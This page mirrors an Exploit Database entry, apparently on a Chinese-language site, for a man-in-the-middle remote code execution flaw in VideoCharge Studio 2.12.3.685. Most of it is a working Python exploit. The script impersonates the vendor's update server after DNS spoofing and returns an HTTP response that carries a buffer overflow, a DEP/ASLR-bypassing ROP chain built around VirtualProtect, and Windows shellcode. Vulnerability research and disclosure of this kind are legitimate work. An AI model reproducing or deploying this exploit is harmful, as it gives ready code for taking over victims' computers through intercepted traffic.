VideoCharge Studio 2.12.3.685 – ‘GetHttpResponse()’ Man In The Middle Remote Code Execution

• Exploit Database
• 89 阅读

• 作者： Julien Ahrens
  日期： 2014-02-20
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/31788/

• #!/usr/bin/python
  # Exploit Title: VideoCharge Studio v2.12.3.685 GetHttpResponse() MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass)
  # Version: v2.12.3.685
  # Date:2014-02-19
  # Author:Julien Ahrens (@MrTuxracer)
  # Homepage:http://www.rcesecurity.com
  # Software Link: http://www.videocharge.com
  # Tested on: Win7-GER (DEP enabled)
  #
  # Howto / Notes:
  # Since it's a MITM RCE you need to spoof the DNS Record for www.videocharge.com in order to successfully exploit this vulnerability
  #
  
  from socket import *
  from struct import pack
  from time import sleep
   
  host = "192.168.0.1"
  port = 80
   
  s = socket(AF_INET, SOCK_STREAM)
  s.bind((host, port))
  s.listen(1)
  print "\n[+] Listening on %d ..." % port
   
  cl, addr = s.accept()
  print "[+] Connection accepted from %s" % addr[0]
   
  # Thanks Giuseppe D'Amore for the amazing shellcode
  # http://www.exploit-db.com/exploits/28996/
  shellcode = ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+
  "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+
  "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+
  "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+
  "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+
  "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+
  "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+
  "\x49\x0b\x31\xc0\x51\x50\xff\xd7")
  
  junk0 = "\x90" * 1277
  junk1 = "\x90" * 1900
  nops="\x90" * 30
  jmpesp=pack('<L',0x102340e8) * 5 # jmp esp |{PAGE_EXECUTE_READ} [cc.dll]
  
  # jump to controlled memory
  eip=pack('<L',0x61b84af1) # {pivot 4124 / 0x101c} # ADD ESP,101C # RETN [zlib1.dll]
  
  #
  # ROP registers structure:
  # EBP - VirtualProtect() call
  # ESP - lpAddress
  # EBX - dwSize
  # EDX - flNewProtect
  # ECX - lpflOldProtect
  #
  
  # Craft VirtualProtect() call (0x0080D816) via [DE2D66F9 XOR DEADBEEF] and MOV to EBP
  rop = pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
  rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
  rop += pack('<L',0xDE2D66F9) # XOR param 1
  rop += pack('<L',0x10206ac5) # POP EBX # RETN [cc.dll]
  rop += pack('<L',0xDEADBEEF) # XOR param 2
  rop += pack('<L',0x1002fb27) # XOR EDI,EBX # ADD DL,BYTE PTR DS:[EAX] # RETN [cc.dll]
  rop += pack('<L',0x101f7572) # MOV EAX,EDI # POP EDI # RETN [cc.dll]
  rop += pack('<L',0xDEADBEEF) # Filler
  rop += pack('<L',0x101fbc62) # XCHG EAX,EBP # RETN [cc.dll]
  
  # Craft VirtualProtect() dwSize in EAX and MOV to EBX
  rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
  rop += pack('<L',0x101f2adc) # ADD EAX,500 # RETN [cc.dll]
  rop += pack('<L',0x1023ccfb) # XCHG EAX,EBX # RETN [cc.dll] 
  
  # Craft VirtualProtect() flNewProtect in EAX and MOV to EDX
  rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
  rop += pack('<L',0x102026a1) # ADD EAX,25 # RETN [cc.dll]
  rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
  rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
  rop += pack('<L',0x102026b1) # ADD EAX,3 # RETN [cc.dll]
  rop += pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
  rop += pack('<L',0x61b90402) # MOV EDX,ECX # RETN [zlib1.dll]
  
  # Put writable offset for VirtualProtect() lpflOldProtect to ECX
  rop += pack('<L',0x1020aacf) # POP ECX # RETN [cc.dll]
  rop += pack('<L',0x61B96180) # writable location [zlib1.dll]
  
  # POP a value from the stack after PUSHAD and POP value to ESI 
  # as a preparation for the VirtualProtect() call
  rop += pack('<L',0x61b850a4) # POP ESI # RETN [zlib1.dll]
  rop += pack('<L',0x61B96180) # writable location from [zlib1.dll]
  rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
  rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
  
  # Achievement unlocked: PUSHAD
  rop += pack('<L',0x101e93d6) # PUSHAD # RETN [cc.dll] 
  rop += pack('<L',0x102340c5) # jmp esp |{PAGE_EXECUTE_READ} [cc.dll]
  
  payload = junk0 + eip + junk1 + rop + jmpesp + nops + shellcode
  
  buffer = "HTTP/1.1 200 OK\r\n"
  buffer += "Date: Sat, 09 Feb 2014 13:33:37 GMT\r\n"
  buffer += "Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g\r\n"
  buffer += "X-Powered-By: PHP/5.2.6-1+lenny16\r\n"
  buffer += "Vary: Accept-Encoding\r\n"
  buffer += "Content-Length: 4000\r\n"
  buffer += "Connection: close\r\n"
  buffer += "Content-Type: text/html\r\n\r\n"
  buffer += payload
  buffer += "\r\n"
   
  print cl.recv(1000)
  
  cl.send(buffer)
  
  print "[+] Sending exploit: OK\n"
  
  sleep(3)
  cl.close()
  s.close()
  

  PowerShell

  Copy